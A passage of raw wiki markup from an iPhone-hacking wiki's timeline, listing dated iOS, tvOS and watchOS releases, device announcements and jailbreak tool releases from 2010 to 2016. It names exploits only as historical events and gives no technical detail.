* 3 May -- iOS 9.3.2 beta 4 and tvOS 9.2.1 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 27 April -- tvOS 9.2.1 beta 3 released.&lt;br /&gt;
* 26 April -- iOS 9.3.2 beta 3 released.&lt;br /&gt;
* 21 April -- tvOS 9.2.1 beta 2 re-released.&lt;br /&gt;
* 20 April -- iOS 9.3.2 beta 2 and watchOS 2.2.1 beta 2 released. tvOS 9.2.1 beta 2 was also made available, but it was quickly retracted due to a mishap with publishing.&lt;br /&gt;
* 6 April -- iOS 9.3.2 beta, watchOS 2.2.1 beta and tvOS 9.2.1 beta released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 31 March -- iOS 9.3.1 released.&lt;br /&gt;
* 28 March -- iOS 9.3 (13E237) released for iPad 2 ([[K93AP|iPad2,1]], [[K95AP|iPad2,3]], and [[K93AAP|iPad2,4]]), [[iPad (3rd generation)]], [[iPad (4th generation)]], [[iPad Air]], [[iPad mini]], [[iPad mini 2]], [[N94AP|iPhone 4s]], [[iPhone 5]], [[iPhone 5c]], [[iPhone 5s]], [[iPod touch (5th generation)]].&lt;br /&gt;
* 25 March -- iOS 9.3 (13E236) released for [[K94AP|iPad 2 (iPad2,2)]].&lt;br /&gt;
* 23 March -- Pangu released [[J42dAP|Apple TV HD]] [[tvOS]] 9.0 - 9.0.1 jailbreak (v1.0.0).&lt;br /&gt;
* 21 March -- iOS 9.3, tvOS 9.2 and watchOS 2.2 released to the public. [[iPad Pro (9.7-inch)]] and [[iPhone SE (1st generation)]] announced&lt;br /&gt;
* 16 March -- Pangu9 1.3.1 (Windows)/1.1.1 (Mac) released to make untether of iOS 9.1 more stable.&lt;br /&gt;
* 14 March -- iOS 9.3 beta 7 released.&lt;br /&gt;
* 11 March -- Pangu9 1.3.0 (Windows)/1.1.0 (Mac) released to jailbreak 64-bit devices on iOS 9.1.&lt;br /&gt;
* 10 March -- tvOS 9.2 beta 6 released.&lt;br /&gt;
* 7 March -- iOS 9.3 beta 6 and watchOS 2.2 beta 6 released.&lt;br /&gt;
* 1 March -- iOS 9.3 beta 5, tvOS 9.2 beta 5 and watchOS 2.2 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 25 February -- [[Apple TV (3rd generation)]] software 7.2.1 released.&lt;br /&gt;
* 22 February -- iOS 9.3 beta 4, tvOS 9.2 beta 4 and watchOS 2.2 beta 4 released.&lt;br /&gt;
* 18 February -- iOS 9.2.1 (13D20) for [[N61AP|iPhone 6]], [[N56AP|iPhone 6 Plus]], [[iPhone 6s]], [[iPhone 6s Plus]], [[iPad mini 3]], [[iPad mini 4]], [[iPad Air 2]], and [[iPad Pro (12.9-inch)]] released.&lt;br /&gt;
* 8 February -- tvOS 9.2 beta 3, watchOS 2.2 beta 3 and iOS 9.3 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 25 January -- tvOS 9.1.1, 9.2 beta 2, watchOS 2.2 beta 2 and iOS 9.3 beta 2 released.&lt;br /&gt;
* 19 January -- iOS 9.2.1 released.&lt;br /&gt;
* 14 January -- iOS 9.3 beta 1.1 released.&lt;br /&gt;
* 11 January -- iOS 9.3, tvOS 9.1.1, tvOS 9.2 beta, and watchOS 2.2 beta released.&lt;br /&gt;
* 4 January -- iOS 9.2.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 25 December -- TaiG 2.4.5 released.&lt;br /&gt;
* 16 December -- iOS 9.2.1 beta seeded to developers.&lt;br /&gt;
* 8 December -- iOS 9.2, tvOS 9.1 and watchOS 2.1 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 30 November -- TaiG 2.4.4 released (no longer beta).&lt;br /&gt;
* 20 November -- TaiG 2.4.4 beta released.&lt;br /&gt;
* 18 November -- iOS 9.2 beta 4 and tvOS 9.1 beta 3 released.&lt;br /&gt;
* 17 November -- iOS 9.1 (13B144) for iPad Pro (12.9-inch) released.&lt;br /&gt;
* 11 November -- [[iPad Pro (12.9-inch)]] released.&lt;br /&gt;
* 10 November -- iOS 9.2 beta 3 and tvOS 9.1 beta 2 released&lt;br /&gt;
* 9 November -- tvOS 9.0.1 released.&lt;br /&gt;
* 3 November -- iOS 9.2 beta 2 and tvOS 9.1 beta released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 29 October -- iOS 9.2 public beta and tvOS 9.0 released.&lt;br /&gt;
* 28 October -- [[Pangu9]] 1.0.0 for Mac released.&lt;br /&gt;
* 27 October -- [[Pangu9]] 1.2.0 and iOS 9.2 beta released.&lt;br /&gt;
* 22 October -- [[Seas0nPass]] 0.9.7 beta released to jailbreak [[K66AP|Apple TV (2nd generation)]] running 6.2.1 tethered.&lt;br /&gt;
* 21 October -- [[Pangu9]] 1.1.0, iOS 9.1, tvOS 9.0GM, watchOS 2.0.1 and iTunes 12.3.1 released.&lt;br /&gt;
* 15 October -- [[Pangu9]] 1.0.1 released.&lt;br /&gt;
* 14 October -- [[Pangu9]] 1.0.0 released to jailbreak iOS 9.0, 9.0.1 and 9.0.2.&lt;br /&gt;
* 12 October -- iOS 9.1 beta 5 released.&lt;br /&gt;
* 6 October -- iOS 9.1 beta 4 and tvOS 9.0 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 30 September -- iOS 9.0.2 and 9.1 beta 3 released.&lt;br /&gt;
* 24 September -- iOS 9.0.1 released for iPhone 6s and iPhone 6s Plus.&lt;br /&gt;
* 23 September -- iOS 9.0.1 (excluding iPhone 6s and iPhone 6s Plus) , 9.1 beta 2 and tvOS 9.0 beta 2 released.&lt;br /&gt;
* 21 September -- watchOS 2.0 released to the public.&lt;br /&gt;
* 16 September -- iOS 9.0 released to the public.&lt;br /&gt;
* 9 September -- iOS 9.0 [[Golden Master|GM]], watchOS 2.0 [[Golden Master|GM]] and iOS 9.1 beta released to developers. [[iPhone 6s]], [[iPhone 6s Plus]], [[iPad Pro (12.9-inch)]], [[iPad mini 4]] and [[J42dAP|Apple TV HD]] announced.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 13 August -- iOS 8.4.1 and iTunes 12.2.2 released.&lt;br /&gt;
* 6 August -- iOS 9.0 beta 5 and watchOS 2.0 beta 5 released.&lt;br /&gt;
* 4 August -- TaiG 1.1.0 for Mac released.&lt;br /&gt;
* 2 August -- TaiG 1.0.0 for Mac released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 30 July -- iOS 8.4.1 beta 2 released.&lt;br /&gt;
* 21 July -- iOS 9.0 beta 4 and watchOS 2.0 beta 4 released.&lt;br /&gt;
* 20 July -- [[TaiG]] 2.4.3 released, no longer a beta.&lt;br /&gt;
* 16 July -- [[TaiG]] 2.4.3 beta released, optimises jailbreak process.&lt;br /&gt;
* 15 July -- [[N102AP|iPod touch (6th generation)]] released.&lt;br /&gt;
* 14 July -- iOS 8.4.1 beta released.&lt;br /&gt;
* 13 July -- [[TaiG]] 2.4.2 Beta released, fixes 30% and 40% issues as well as bundling Cydia 1.1.23. [[PPJailbreak]] 2.0.0 released to jailbreak iOS 8.1.3 - 8.4 on Mac.&lt;br /&gt;
* 11 July -- [[TaiG]] 2.4.1 released.&lt;br /&gt;
* 10 July -- [[TaiG]] 2.4.1 Beta released, fixes 60% issue.&lt;br /&gt;
* 7 July -- [[TaiG]] 2.3.1 released.&lt;br /&gt;
* 6 July -- [[TaiG]] 2.3.1 Beta released, includes Cydia 1.1.20.&lt;br /&gt;
* 3 July -- [[TaiG]] 2.3.0 released, which removes the setruid-patch&lt;br /&gt;
* 2 July -- [[TaiG]] 2.2.1 released to address a security vulnerability allowing all apps to get root easily.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 30 June -- iOS 8.4 released. [[TaiG]] 2.2.0 released to jailbreak iOS 8.4.&lt;br /&gt;
* 23 June -- [[TaiG]] 2.0.0 released to jailbreak iOS 8.1.3, 8.2 and 8.3.&lt;br /&gt;
* 8 June -- Apple announces iOS 9, watchOS 2.0, and a release date of June 30 for iOS 8.4 at [[WWDC]] 2015.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 15 May -- [[User:geohot|geohot]] [[The iPhone Wiki:Changing Ownership|transfers]] ownership of The iPhone Wiki to [[User:saurik|saurik]].&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 23 April -- iOS 8.2 (build 12S506) released for Apple Watch.&lt;br /&gt;
* 8 April -- iOS 8.3 and Apple TV 7.2 released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 9 March -- iOS 8.2 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 23 February -- [[TaiG]] updated to version 1.3 to support iOS 8.2 beta and beta 2.&lt;br /&gt;
* 12 February -- [[TaiG]] updated to version 1.2.1 to support iTunes 12.1.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 27 January -- iOS 8.1.3 and 7.0.3 (8.1.3) for Apple TV released.&lt;br /&gt;
* 18 January -- [[PPJailbreak]] released to jailbreak iOS 8.0 - 8.1.2 on a Mac.&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 9 December -- iOS 8.1.2 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 29 November -- [[TaiG]] released to jailbreak iOS 8.0 - 8.1.1 on all devices except Apple TV.&lt;br /&gt;
* 18 November -- iOS 8.1.1 and Apple TV 7.0.2 released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 22 October -- [[Pangu8]] for iOS 8.x released.&lt;br /&gt;
* 20 October -- iOS 8.1 released.&lt;br /&gt;
* 16 October -- [[iPad Air 2]] and [[iPad mini 3]] announced.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 25 September -- iOS 8.0.2 released.&lt;br /&gt;
* 24 September -- iOS 8.0.1 released. Critical bugs affecting Touch ID and cellular service was quickly discovered[http://support.apple.com/kb/HT6487] and the update was retracted.&lt;br /&gt;
* 19 September -- Initial release of [[N61AP|iPhone 6]] and [[N56AP|iPhone 6 Plus]].&lt;br /&gt;
* 17 September -- iOS 8.0 is released to the public, as well as 6.2.1 for the [[K66AP|Apple TV (2nd generation)]].&lt;br /&gt;
* 9 September -- Apple announces the [[Apple Watch (1st generation)]], [[N61AP|iPhone 6]], and [[N56AP|iPhone 6 Plus]].&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 30 June -- iOS 7.1.2 and Apple TV 6.2 released to fix iBeacon connectivity, mail attachments not being encrypted and a bug with data transfers from third party accessories.&lt;br /&gt;
* 29 June -- [[Pangu]] 1.1.0 released with lots of improvements.&lt;br /&gt;
* 23 June -- [[Pangu]] released to jailbreak iOS 7.1.x untethered.&lt;br /&gt;
* 1 June -- [[p0sixspwn]] updated to version 1.0.8 to support iOS 6.1.6 and fix iTunes 11.1+ crashes.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 22 April -- [[iOS]] 7.1.1 and Apple TV 6.1.1 released with bug fixes, including [[Touch ID]] fixes.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 27 March -- [[evasi0n7]] updated to 1.0.8 to support iOS 7.0 (11A466) that shipped with some 5s and 5c iPhones&lt;br /&gt;
* 10 March -- [[iOS]] 7.1, Apple TV iOS 6.1, [[J73AP|iPad Air (iPad4,3)]] and [[J87AP|iPad mini 2 (iPad4,6)]] released.&lt;br /&gt;
* 1 March -- [[evasi0n7]] updated to 1.0.7 to fix problem where bundled repository package information could not be refreshed/updated by Cydia and updated bundled Cydia package lists.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 26 February -- [[iTunes]] updated to 11.1.5 to fix crashing and improve iBooks compatibility on OS X.&lt;br /&gt;
* 22 February -- [[evasi0n7]] updated to version 1.0.6 to support iOS 7.0.6.&lt;br /&gt;
* 21 February -- [[iOS]] 7.0.6 and iOS 6.1.6 released to address faulty SSL validation.&lt;br /&gt;
* 5 February -- [[evasi0n7]] updated to version 1.0.5 to support iOS 7.0.5.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 29 January -- [[iOS]] 7.0.5 released for [[N49AP|iPhone 5c (iPhone5,4)]] and [[N53AP|iPhone 5s (iPhone6,2)]], fixing network provisioning.&lt;br /&gt;
* 22 January -- [[iTunes]] 11.1.4 released, adding Wish List and language improvements. &lt;br /&gt;
* 12 January -- [[evad3rs]] releases [[evasi0n7]] 1.0.4 to fix important untether security bugs.&lt;br /&gt;
* 11 January -- [[evad3rs]] releases [[evasi0n7]] 1.0.3 to fix [[iPad mini 2]] bootloop issues, support iOS 7.1 beta 3 and include [[Cydia]] 1.1.9.&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 31 December -- [[evad3rs]] releases [[evasi0n7]] 1.0.2 to fix [[iPad 2]] bootloop issues.&lt;br /&gt;
* 30 December -- [[User:Ih8sn0w|iH8sn0w]], [https://twitter.com/SquiffyPwn SquiffyPwn], and [[User:winocm|winocm]] release [[p0sixspwn]], an [[untethered jailbreak]] for iOS 6.1.3 through 6.1.5, for Mac OS X.&lt;br /&gt;
* 24 December -- [[evad3rs]] releases [[evasi0n7]] 1.0.1 to completely remove Chinese piracy store.&lt;br /&gt;
* 22 December -- [[evad3rs]] releases [[evasi0n7]], an [[untethered jailbreak]] for iOS 7.0 through 7.0.4.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 14 November -- [[iOS]] 7.0.4, 6.1.5 for iPod touch (4th generation) to fix [[FaceTime]] bugs and [[List of Apple TVs|Apple TV]] 6.0.2 released.&lt;br /&gt;
* 1 November -- [[iPad Air]] released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 24 October -- Apple TV firmware updated to 6.0.1.&lt;br /&gt;
* 22 October -- [[iOS]] 7.0.3 released to fix various bugs including a passcode bug. [[iPad Air]] and [[iPad mini 2]] announced.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 26 September -- [[iOS]] 7.0.2 released to address Lock screen issues.&lt;br /&gt;
* 23 September -- Apple releases a patched version of the Apple TV 6.0 update.&lt;br /&gt;
* 20 September -- Initial release of [[iPhone 5c]] and [[iPhone 5s]]. iOS 7.0.1 is also made available for these devices. A 6.0 update for the Apple TV was also released, but is pulled due to problems.[http://www.macrumors.com/2013/09/22/apple-pulls-apple-tv-6-0-update-following-reports-of-bricking/]&lt;br /&gt;
* 18 September -- [[iOS]] 7.0 released for the [[iPad 2]] and newer, [[iPad mini]], [[iPhone 4]] and newer, [[iPod touch (4th generation)]].&lt;br /&gt;
* 10 September -- Apple announces the [[iPhone 5c]] and [[iPhone 5s]].&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 25 June -- [[iFaith]] 1.5.9 released.&lt;br /&gt;
* 19 June -- Apple TV firmware 5.3 released. &lt;br /&gt;
* 10 June -- Apple unveils a completely-revamped [[iOS]] 7 at [[WWDC]].&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 30 May -- Apple quietly unveils a 16 GB version of the [[N78aAP|iPod touch (5th generation)]] that omits the rear camera, replacing the [[N81AP|iPod touch (4th generation)]].&lt;br /&gt;
* 2 May -- [[iOS]] 6.1.4 released for [[iPhone 5]].&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 13 April -- [[iFaith]] updated to version 1.5.8.&lt;br /&gt;
* 11 April -- [[Sn0wbreeze]] updated to version 2.9.14.&lt;br /&gt;
* 10 April -- [[iFaith]] updated to version 1.5.7.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 10 March -- [[iFaith]] updated to version 1.5.6.&lt;br /&gt;
* 19 March -- Apple releases [[iOS]] 6.1.3 to patch multiple security-related bugs and improve Maps for Japanese users.&lt;br /&gt;
* 12 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.3.&lt;br /&gt;
* 11 March --  [[evad3rs]] updated [[evasi0n]] to 1.5.2.&lt;br /&gt;
* 10 March -- [[iFaith]] updated to version 1.5.5.&lt;br /&gt;
* 5 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.1.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 23 February -- [[iFaith]] updated to version 1.5.4.&lt;br /&gt;
* 23 February -- [[evad3rs]] updated [[evasi0n]] to 1.5. [[iFaith]] updated to version 1.5.3.&lt;br /&gt;
* 19 February -- Apple releases [[iOS]] 6.1.2 as a hotfix to address Exchange issues. [[Evasi0n]] was updated to support iOS 6.1.2 later the same day.&lt;br /&gt;
* 13 February -- [[Seas0nPass]] updated to support [[iOS]] 5.2 for the [[K66AP|Apple TV (2nd generation)]] [[untethered jailbreak]].&lt;br /&gt;
* 11 February -- Apple releases [[iOS]] 6.1.1 for the [[N94AP|iPhone 4s]] as a hotfix to address connectivity issues. [[evasi0n]] was updated to support [[iOS]] 6.1.1 later the same day.&lt;br /&gt;
* 4 February -- The [[evad3rs]] release [[evasi0n]] to [[jailbreak]] [[iOS]] 6.x.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 28 January -- Apple releases [[iOS]] 6.1.&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 18 December -- Apple releases [[iOS]] 6.0.2 containing bug fixes for the [[iPhone 5]] and [[iPad mini]].&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 30 November -- Apple releases [[iTunes]] 11.&lt;br /&gt;
* 12 November -- [[sn0wbreeze]] is updated to version 2.9.7.&lt;br /&gt;
* 2 November -- Inital release of [[iPad (4th generation)]] and [[iPad mini]] in first set of countries.&lt;br /&gt;
* 1 November -- Apple releases [[iOS]] 6.0.1.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 23 October -- Apple announces new [[iPad (4th generation)]] and [[iPad mini]].&lt;br /&gt;
* 14 October -- The [[iPhone Dev Team]] releases [[redsn0w]] 0.9.15b1, which lets A5(X) users with the appropriate [[SHSH]] blobs remain on, or update to, [[iOS]] 5.x.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 21 September -- Initial release of [[iPhone 5]] in first set of countries.&lt;br /&gt;
* 19 September -- Apple releases [[iOS]] 6.&lt;br /&gt;
* 12 September -- Apple announces new [[iPhone 5]] and release date of iOS 6.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 18 June -- [[iPhone Dev Team]] releases a new version of [[redsn0w]] (0.9.14b1), adding the capability to downgrade iPhone [[N82AP|3G]]/[[N88AP|3GS]] [[Baseband]] from the [[06.15.00]] iPad baseband to the latest unlockable iPhone baseband ([[05.13.04]]). This allows 3G/3GS users that had upgraded to the iPad baseband, thus losing the GPS function and the ability to restore to stock firmware, to get back to an iPhone baseband, making their devices behave as intended again, as well as being unlockable by [[ultrasn0w]].&lt;br /&gt;
* 14 June -- [[iPhone Dev Team]] releases a developer version of [[redsn0w]] (0.9.13dev1), which jailbreaks [[limera1n]] susceptible devices running [[iOS]] 6.0 beta. This version doesn't hacktivate nor install [[Cydia]], as it hasn't been ported to [[iOS]] 6 just yet. This jailbreak, however, installs afc2 and SSH, enabling developers to fix and prepare their apps to the next [[iOS]] version.&lt;br /&gt;
* 11 June -- Apple announces [[iOS]] 6 at [[WWDC]] 2012, and seeds the first beta to developers.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 25 May -- The [[Chronic Dev (team)|Chronic Dev Team]] releases [[Absinthe]] 2.0, providing an [[untethered jailbreak]] for all devices except the [[Apple TV]]s and [[K93AAP|iPad 2 (iPad2,4)]]. ([[Seas0nPass]] was also updated to include [[Absinthe]]'s [[untethered jailbreak|untether]] for the [[K66AP|Apple TV (2nd generation)]].)&lt;br /&gt;
* 7 May -- Apple releases [[iOS]] 5.1.1.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 7 March -- Apple releases [[iOS]] 5.1 and announces new devices: [[iPad (3rd generation)]], [[J33AP|Apple TV (3rd generation)]], and the [[K93AAP|iPad 2 (iPad2,4)]].&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 20 January -- [[Absinthe]] was released to [[jailbreak]] and [[untethered jailbreak|untether]] the [[A5]] devices running [[iOS]] 5.0 and 5.0.1.&lt;br /&gt;
* 18 January -- Apple announces [[iBooks.app|iBooks version 2.0]].&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 30 December -- [[User:pod2g|pod2g]]'s [[untethered jailbreak|untether]] for [[iOS]] 4.4.4 makes its way into a new version of [[Seas0nPass]] for [[K66AP|Apple TV (2nd generation)]] owners.&lt;br /&gt;
* 27 December -- [[User:pod2g|pod2g]]'s [[untethered jailbreak|untether]] for [[iOS]] 5.0.1 is released in new versions of [[PwnageTool]] and [[redsn0w]], and as a Cydia package called [[Corona]] (by the [[Chronic Dev (team)|Chronic Dev Team]]) for devices already jailbroken on 5.0.1.&lt;br /&gt;
* 15 December -- Apple releases [[iOS]] 4.4.4 for the [[K66AP|Apple TV (2nd generation)]], as well as a minor update (5.0.1 build 9A406) for the [[N94AP|iPhone 4s]] to address SIM card issues.&lt;br /&gt;
* 4 December -- [[iFaith]] 1.4 is released, which can circumvent the [[APTicket]] [[nonce]] on devices vulnerable to [[limera1n]]'s exploit.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 10 November -- [[iOS]] 5.0.1 is released in an attempt to fix battery-related issues. It's the first non-beta available as an [[OTA Updates|OTA update]].&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 14 October -- The [[N94AP|iPhone 4s]] is officially released, although some preorders were delivered early.&lt;br /&gt;
* 12 October -- [[iOS]] 5.0 is released. The [[N94AP|iPhone 4s]] IPSW came with [[04.11.08]] due to a goof on Apple's side.&lt;br /&gt;
* 5 October -- Steve Jobs passes away.&lt;br /&gt;
* 4 October -- Apple announces the new [[N94AP|iPhone 4s]].&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 19 September -- [[redsn0w]] 0.9.9 beta 1 is released, introducing a new UI and many features (like submitting [[SHSH]]s to the [[Cydia Server]].&lt;br /&gt;
* 17 September -- [[MyGreatFest]], first iCommunity and jailbreak centered convention was held.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 15 July -- Apple releases [[iOS]] 4.2.9 and 4.3.4, patching all jailbreaking-related vulnerabilities (aside from those in the [[bootrom]]).&lt;br /&gt;
* 6 July -- [[User:Comex|comex]] releases [[Saffron]], the first public [[jailbreak]] for the [[iPad 2]].&lt;br /&gt;
* 2 July -- A beta version of the upcoming [[jailbreak]] from [[User:comex|comex]] for the [[iPad 2]], making use of a PDF exploit, was leaked. A hotfix by Apple is expected very soon.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 1 June -- [[User:ih8sn0w|iH8sn0w]] releases [[iFaith]] to dump [[SHSH]] blobs from a device.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 6 May -- [[PwnageTool]], [[redsn0w]], and [[sn0wbreeze]] are updated for [[iOS]] 4.3.3 support (and in the case of sn0wbreeze, [[iOS]] 4.2.8 support as well).&lt;br /&gt;
* 3 May -- Apple releases [[iOS]] 4.2.8 and 4.3.3 to address the location-tracking controversy. Once more, current [[untethered jailbreak|untethering]] vulnerabilities remained unpatched.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 24 April -- [[PwnageTool]], [[redsn0w]], and [[sn0wbreeze]] are updated for [[iOS]] 4.3.2 support (and in the case of sn0wbreeze, [[iOS]] 4.2.7 support as well).&lt;br /&gt;
* 14 April -- Apple releases [[iOS]] 4.2.7 and 4.3.2 to fix security issues and connection issues for [[K95AP|iPad 2 (iPad2,3)]], but leaves [[untethered jailbreak|untethering]] vulnerabilities unpatched.&lt;br /&gt;
* 3 April -- All major jailbreak tools ([[redsn0w]], [[PwnageTool]], [[sn0wbreeze]]) get updated to includes [[i0n1c]]'s [[untethered jailbreak|untether]] code to jailbreak devices compatible with iOS 4.3.1 except the [[iPad 2]].&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 25 March -- Apple releases iOS 4.3.1, properly blocking [[User:comex|comex]]'s [[IOSurface Kernel Exploit|exploit]].&lt;br /&gt;
* 13 March -- [[User:Comex|comex]] shows a remotely jailbroken [[K95AP|iPad 2 (iPad2,3)]].&lt;br /&gt;
* 11 March -- Release of the [[iPad 2]] in the USA. The exploits for [[limera1n]] ([[User:Geohot|geohot]]), [[SHA-1 Image Segment Overflow|SHAtter]] ([[User:posixninja|p0sixninja]]), and [[comex]]'s [[kernel]] exploit were closed by Apple.&lt;br /&gt;
* 9 March -- Apple releases [[iOS]] 4.3, fixing the [[HFS Legacy Volume Name Stack Buffer Overflow]] vulnerability.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 15 February -- New version of both [[PwnageTool]] and [[sn0wbreeze]] were released to support 4.2.1 and untethered using the [[feedface]] exploit.&lt;br /&gt;
* 7 February -- The [[Chronic Dev (team)|Chronic Dev Team]] release a version of [[greenpois0n (jailbreak)|greenpois0n]] to jailbreak the [[N92AP|iPhone 4 (iPhone3,3)]], using the [[HFS Legacy Volume Name Stack Buffer Overflow]].&lt;br /&gt;
* 3 February -- [[User:Jaywalker|Jaywalker]] of the [[Chronic Dev (team)|Chronic Dev Team]] posts [https://www.youtube.com/watch?v=T3NYPVT13xw a video] of custom boot using a soon to be released version of [[Greenpois0n (jailbreak)|greenpois0n]].&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 12 January -- Apple discontinues [[iOS]] support for [[N82AP|iPhone 3G]] and [[N72AP|iPod touch (2nd generation)]] since today's beta release of [[iOS]] 4.3. Also first time a beta [[iOS]] for [[K66AP|Apple TV (2nd generation)]] is released.&lt;br /&gt;
* 11 January -- Verizon announces [[N92AP|iPhone 4 (iPhone3,3)]].&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
=== November ===&lt;br /&gt;
* 28 November -- [[ultrasn0w]] 1.2 is released by the [[iPhone Dev Team]] to unlock [[N82AP|iPhone 3G]] and [[N88AP|iPhone 3GS]] on baseband 6.15.00&lt;br /&gt;
* 22 November -- Apple releases [[iOS]] 4.2.1 (respectively 4.2 for [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 31 October -- The [[iPhone Dev Team|Dev Team]] releases [[redsn0w]] 0.9.6b2 which jailbreaks [[iOS]] 4.1, 4.2 and 3.2.2 on every device available at the time of release (except for iPod touch (2nd generation) MC). It also includes &amp;quot;DFU&amp;quot; button allowing to flash custom [[IPSW]] from Windows [http://blog.iphone-dev.org/post/1452044444/redsn0w-limera1n-fun (see blog post)].&lt;br /&gt;
* 20 October -- The [[iPhone Dev Team|Dev Team]] releases [[PwnageTool]] 4.1 which jailbreaks [[iOS]] 4.1 and 3.2.2 on every device  available at the time of release. [http://blog.iphone-dev.org/post/1359246784/20102010-event (see blog post)]&lt;br /&gt;
* 18 October -- [[Chronic Dev (team)|Chronic Dev Team]] releases [[Greenpois0n (jailbreak)|greenpois0n]] RC4 which added support for iPod touch (2nd generation) (MC and MB) for an untethered jailbreak using [[User:comex|comex]]'s kernel exploit and the [[usb_control_msg(0xA1, 1) Exploit]].&lt;br /&gt;
* 12 October -- [[Chronic Dev (team)|Chronic Dev Team]] releases [[Greenpois0n (jailbreak)|greenpois0n]] after switching its exploit from [[SHA-1 Image Segment Overflow|SHAtter]] to [[limera1n]], in the hope that [[SHA-1 Image Segment Overflow|SHAtter]] remains for 5th generation devices. (The exploit [[limera1n]] uses was fixed in the [[iBoot (Bootloader)|iBoot]] revision found in [[iOS]] 4.2 beta 2, which means Apple knows about the vulnerability and the next [[bootrom]] revision may have it patched.)&lt;br /&gt;
* 10 October -- Following the first [[limera1n]] beta release, [[User:geohot|geohot]] released multiple versions, each fixing bugs affecting previous releases. [[Chronic Dev (team)|Chronic Dev Team]] officialy anounces that, in order to keep [[SHA-1 Image Segment Overflow|SHAtter]] undisclosed and possibly preserve it for 5th generation devices, [[Greenpois0n (jailbreak)|greenpois0n]] would be delayed in order to incorporate this new exploit [[limera1n]] uses.&lt;br /&gt;
* 9 October -- In order to push [[Chronic Dev (team)|Chronic Dev Team]] to change the exploit used on [[Greenpois0n (jailbreak)|greenpois0n]], [[User:geohot|geohot]] rushed out a beta version of [[limera1n]].&lt;br /&gt;
